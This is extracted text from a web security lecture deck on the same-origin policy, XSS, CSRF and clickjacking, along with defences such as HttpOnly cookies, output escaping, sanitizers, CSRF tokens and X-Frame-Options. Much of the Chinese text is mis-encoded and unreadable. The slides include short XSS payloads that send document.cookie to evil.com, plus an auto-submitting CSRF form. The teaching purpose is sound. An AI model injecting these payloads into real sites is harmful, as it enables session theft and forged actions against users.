Slide 1
Slide 1 text
Selected Topics on
Website Security
Concept of Same Origin Policy, XSS, CSRF & Clickjacking
MrOrz, 102-2 CCSP
Reference: ⽩白帽⼦子講 Web 安全
Slide 2
Slide 2 text
খࢿ҆શલি
Concept of Same Origin Policy, XSS, CSRF & Clickjacking
MrOrz, 102-2 CCSP
Reference: ⽩白帽⼦子講 Web 安全
Slide 3
Slide 3 text
Same-Origin Policy
ಉݯࡦ
Slide 4
Slide 4 text
ᖣ᧸ث࠷֩৺࠷جຊత҆શޭೳʜʜ
8FCੋݐߏࡏಉݯࡦతجૅ೭্తɻ
– 吳翰清
❝
❞
Slide 5
Slide 5 text
Same Origin Different Origin
ڋ㘺
Ҹڐ
ڈ፤
త౦
ڈ፤
త౦
㑌ݸᖣ᧸ث။ɿ
Slide 6
Slide 6 text
Same Origin Different Origin
ڋ㘺
Ҹڐ
ڈ፤
త౦
ڈ፤
త౦
एᔒ༗ಉݯࡦɿ
Slide 7
Slide 7 text
Same Origin Different Origin
ڋ㘺
Ҹڐ
ڈ፤
త౦
ڈ፤
త౦
Upon visiting http://evil.mobile.org :
$.get(‘http://facebook.com’, {},
function(data){
// 未經允許就得到你的 Facebook 塗鴉牆
}, ‘html’);
एᔒ༗ಉݯࡦɿ
Slide 8
Slide 8 text
https://developer.mozilla.org/zh-TW/docs/JavaScript/Same_origin_policy_for_JavaScript
host, port & protocol
Same Origin
Different
Origin
Slide 9
Slide 9 text
༬ઃڋ㘺ލҬ፤ࢿྉ
Լྻҝಛྫ
Slide 10
Slide 10 text
ಛྫҰɿՄލҬࡌೖࢿݯ೭ඪត
•
• <img>
• <iframe>
• <link>
• Javascript 無從讀寫其內容
Slide 11
Slide 11 text
ಛྫೋɿ$SPTT0SJHJO
3FTPVSDF4IBSJOH $034
• Origin request header
• Access-Control-Allow-XXX response header
• Enabling cross-origin ajax, web font, WebGL & canvas
Slide 12
Slide 12 text
Cross-Site Scripting
(XSS)
Slide 13
Slide 13 text
ࢦ᱆٬ಁաʮ)5.-২ೖʯ篡վྃทɼᎎೖྃ
ዱҙతࢦྩߘɼਐҰ㑊ࡏ༻ऀᖣ᧸ท࣌ɼ߇
੍༻ऀᖣ᧸ثతҰछ߈㐝ɻ
– 吳翰清
❝
❞
Slide 14
Slide 14 text
<%- user.desc %>
Your site : Example #1
༻ऀ
༌ೖత)5.-
Slide 15
Slide 15 text
Hello
I am Johnson
Your site : Example #1Slide 16
Slide 16 text
$.getJSON('http://evil.com/', {
stoken: document.cookie
});
Your site : Example #1
፨๚ࠑ༻㖽ท໘తਓɼDPPLJF။ඃFWJMDPN䫖
Slide 17
Slide 17 text
var pageTitle = "<%= userPage.title %>";
Your site : Example #2
༻ऀࣗ༝༌ೖతࣈ۲
Slide 18
Slide 18 text
var pageTitle = ""; $.getJSON(...); "";
Your site : Example #2
፨๚ࠑ༻㖽ท໘తਓɼࢿྉ။ඃ䫖
Slide 19
Slide 19 text
$.getJSON('http://yoursite.com/page/'+pageId, {},
function(data){
$('h1').html(data.userPageTitle);
});
Your site : Example #3
༻ऀࣗ༝༌ೖతࣈ۲
Welcome to my page!
Slide 20
Slide 20 text
$.getJSON('http://yoursite.com/page/'+pageId, {},
function(data){
$('h1').html(data.userPageTitle);
});
Your site : Example #3
༻ऀࣗ༝༌ೖతࣈ۲
Welcome to my page!$.getJSON('http://evil.com',...);
Slide 21
Slide 21 text
Ṝछ߈㐝తࣔൣҊྫੋލҬతɼॴҎڣ z$SPTTz
4JUF 4DSJQUJOHɻᚙల౸ࠓఱɼੋ൱ލҬቮៃෆ
࠶ॏཁɼ944Ṝݸ໊ࣈჟҰอཹྃԼိɻ
– 吳翰清
❝
❞
Slide 22
Slide 22 text
ڔํࣜ
防⽌止 Cookie 盜⽤用:HttpOnly
res.cookie('key', 'value', {
httpOnly: true
});
༬ઃଖመबੋUSVF
Slide 23
Slide 23 text
ڔํࣜ
防⽌止 Cookie 盜⽤用:HttpOnly
res.cookie('key', 'value', {
httpOnly: true
});
༬ઃଖመबੋUSVF
Slide 24
Slide 24 text
ڔํࣜ
HTML 輸出檢查 — 盡量不⽤用 <%- %>
<%= user.desc %>
Slide 25
Slide 25 text
ڔํࣜ
HTML 輸出檢查 — Caja-HTML-Sanitizer
// Controller
!
var sanitizer = require('sanitizer');
sanitizedIntro = sanitizer.sanitize(user.desc);
!
<%- sanitizedIntro %>
อཹແత)5.-UBHT
Slide 26
Slide 26 text
ڔํࣜ
Javascript 輸出檢查 — ⽤用現成 JSON.stringify
var page = <%- JSON.stringify({
title: userPage.title
}) %>;
Slide 27
Slide 27 text
ڔํࣜ
DOM-based XSS — 盡量⽤用 .text(…) 取代 .html(…)
或先 sanitize 想插⼊入的 HTML.
$.getJSON('http://yoursite.com/page/'+pageId, {},
function(data){
$('h1').text(data.userPageTitle);
});
Slide 28
Slide 28 text
Cross-Site Request
Forgery (CSRF/XSRF)
Slide 29
Slide 29 text
Your site : Example #4
// Delete current user account
app.get('/user/delete', userCtrl.delete);
Slide 30
Slide 30 text
evil.com : Example #4
፨๚ࠑFWJMTJUFతਓɼ౸ྃ
વޙ䭪ʗଞࡏZPVSTJUFDPNతாᥒबല໊ඃ႟ᎃྃ
Slide 31
Slide 31 text
߈㐝ऀᷮᷮ༠ಋ༻ऀ๚ྃҰݸท໘ɼबҎ֘
༻ऀతɼࡏZPVSTJUFDPNཫࣥߦྃҰ࣍ૢ
࡞ʜʜṜछ SFRVFTU ੋ߈㐝ऀॴِతɼॴҎ
ڣz$SPTTTJUF3FRVFTU'PSHFSZzɻ
– 吳翰清
❝
❞
Slide 32
Slide 32 text
Demo:cryptogasm.com/gmail-logout.html
Slide 33
Slide 33 text
evil.com : Example #5
፨๚FWJMTJUFޙɼ༻ऀࡏZPVSTJUFDPNతாᥒबല໊ඃ႟ᎃྃ
!
$('#evil-form').submit();
Slide 34
Slide 34 text
ڔํࣜ
• CSRF 攻擊成功的要素:request 的所有參數都可以被
攻擊者猜測到。
• Anti-CSRF Token:使攻擊者無法拼湊正確 request。
Slide 35
Slide 35 text
ڔํࣜ
Slide 36
Slide 36 text
ڔํࣜ
Slide 37
Slide 37 text
ڔํࣜ
දᄸૹग़ޙɼޙDPOUSPMMFS။ᒾ查දᄸత
UPLFOੋ൱ᢛDPPLJFதతUPLFO૬ූɼ
एෆҰᒬɼबෆ၏ࣄɻ
Slide 38
Slide 38 text
ڔํࣜ
http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3
// Express settings
!
app.use(express.cookieParser('optional secret string'));
app.use(express.session());
app.use(express.csrf());
app.use(function (req, res, next) {
res.locals.csrftoken = req.csrfToken();
next();
});
!
!
!
!
ᩋTFTTJPOཫతBOUJDTSGUPLFO
ࡏWJFXཫೳ፤ಘ౸
Slide 39
Slide 39 text
Clickjacking
Slide 40
Slide 40 text
Jeremiah Grossman and Robert Hansen, 2008
Slide 41
Slide 41 text
http://www.crazylearner.org/clickjacking-example/
Copyright 2014 Crazylearner. Fair use
Slide 42
Slide 42 text
No content
Slide 43
Slide 43 text
ڔํࣜ
w ᩋ㟬తෆඃ࠹ਐJGSBNFཫ
• x-frame-options: deny
w IUUQTHJUIVCDPNFWJMQBDLFUIFMNFU
Can’t be your site!
Slide 44
Slide 44 text
http://youtu.be/VRCUpXLguHM 吳翰清 著
Slide 45
Slide 45 text
http://youtu.be/VRCUpXLguHM 吳翰清 著